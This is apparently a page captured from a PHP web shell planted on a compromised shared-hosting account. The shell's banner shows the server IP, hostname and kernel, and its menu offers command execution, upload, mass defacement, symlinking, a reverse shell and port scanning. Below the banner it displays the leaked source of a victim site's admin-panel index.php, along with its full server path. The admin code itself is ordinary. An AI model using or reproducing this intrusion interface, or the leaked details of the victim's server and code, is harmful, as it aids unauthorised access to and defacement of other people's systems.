Tul xxx Tul
User / IP
:
216.73.216.217
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
emprendo.com.co
/
public_html
/
ecomercial
/
admin
/
Viewing: index.php
<?php /** * Admin Panel Front Controller * * Single entry point for all admin panel requests. * Handles routing, authentication, database connection, and layout rendering. * * URL Pattern: /admin/index.php?section={section_name} * Valid sections: clients, orders, contents, products, web, users * Default section: clients */ // ============================================================================ // 1. Bootstrap and Session Validation // ============================================================================ require_once __DIR__ . '/../app/bootstrap.php'; require_once __DIR__ . '/../app/schema.php'; require_once __DIR__ . '/../app/portal_helpers.php'; // Require admin authentication - redirects to login if not authenticated require_admin(); // ============================================================================ // 2. Database Connection // ============================================================================ try { $pdo = db(true); } catch (Throwable $exception) { exit('No se pudo conectar con MySQL. Revisa config/database.php e importa database/schema.sql.'); } // Update session with profile fields if missing/stale (for users logged in before these fields were added) $currentUser = admin_user(); if ($currentUser) { try { $stmt = $pdo->prepare('SELECT username, name, signature_url, photo_url, is_active FROM cms_users WHERE id = ? LIMIT 1'); $stmt->execute([$currentUser['id']]); $profile = $stmt->fetch(); if ($profile) { $_SESSION['admin_user']['username'] = $profile['username'] ?? ($_SESSION['admin_user']['username'] ?? ''); $_SESSION['admin_user']['name'] = $profile['name'] ?? ($_SESSION['admin_user']['name'] ?? ''); $_SESSION['admin_user']['signature_url'] = $profile['signature_url'] ?? ''; $_SESSION['admin_user']['photo_url'] = $profile['photo_url'] ?? ''; $_SESSION['admin_user']['is_active'] = $profile['is_active'] ?? 1; } } catch (Throwable $exception) { $_SESSION['admin_user']['signature_url'] = $_SESSION['admin_user']['signature_url'] ?? ''; $_SESSION['admin_user']['photo_url'] = $_SESSION['admin_user']['photo_url'] ?? ''; } } // ============================================================================ // 3. Load Helper Files // ============================================================================ require_once __DIR__ . '/helpers/common.php'; require_once __DIR__ . '/helpers/client_helpers.php'; require_once __DIR__ . '/helpers/order_helpers.php'; require_once __DIR__ . '/helpers/content_helpers.php'; require_once __DIR__ . '/helpers/product_helpers.php'; require_once __DIR__ . '/helpers/asset_helpers.php'; require_once __DIR__ . '/helpers/database_helpers.php'; require_once __DIR__ . '/helpers/email_helpers.php'; // ============================================================================ // 4. Ensure Database Schema is Up to Date // ============================================================================ ensure_orders_schema($pdo); ensure_client_portal_schema($pdo); ensure_email_schema($pdo); // ============================================================================ // 5. Process POST Requests (Form Handler) // ============================================================================ require_once __DIR__ . '/handlers/form_handler.php'; // ============================================================================ // 6. Define Valid Sections // ============================================================================ $validSections = ['dashboard', 'clients', 'orders', 'contents', 'products', 'emails', 'web', 'users']; // ============================================================================ // 7. Get Current Section from URL (with default) // ============================================================================ $currentSection = $_GET['section'] ?? 'dashboard'; // ============================================================================ // 8. Validate Section // ============================================================================ if (!in_array($currentSection, $validSections, true)) { // Invalid section - default to dashboard $currentSection = 'dashboard'; } // ============================================================================ // 9. Map Sections to File Paths // ============================================================================ $sectionFiles = [ 'dashboard' => __DIR__ . '/sections/dashboard.php', 'clients' => __DIR__ . '/sections/clients.php', 'orders' => __DIR__ . '/sections/orders.php', 'contents' => __DIR__ . '/sections/contents.php', 'products' => __DIR__ . '/sections/products.php', 'emails' => __DIR__ . '/sections/emails.php', 'web' => __DIR__ . '/sections/web.php', 'users' => __DIR__ . '/sections/users.php', ]; $sectionFile = $sectionFiles[$currentSection]; // ============================================================================ // 10. Load Section File and Capture Content // ============================================================================ $sectionContent = ''; if (file_exists($sectionFile)) { // Section files return their content via output buffering $sectionContent = require $sectionFile; } else { // Fallback if section file doesn't exist $sectionContent = '<div class="alert alert-warning">Sección no encontrada.</div>'; } // ============================================================================ // 11. Define Page Titles // ============================================================================ $pageTitles = [ 'dashboard' => 'Dashboard', 'clients' => 'Clientes', 'orders' => 'Pedidos', 'contents' => 'Contenidos', 'products' => 'Productos', 'emails' => 'Correos', 'web' => 'Web', 'users' => 'Usuarios', ]; $pageTitle = $pageTitles[$currentSection] ?? 'Admin'; // ============================================================================ // 12. Get Flash Message from Session // ============================================================================ $flash = flash(); // ============================================================================ // 13. Initialize Global Variables for Layout // ============================================================================ // Initialize contactsByClient if not already defined by section if (!isset($contactsByClient)) { $contactsByClient = []; } // ============================================================================ // 14. Render Layout // ============================================================================ require __DIR__ . '/layout.php';
Coded With 💗 by
0x6ick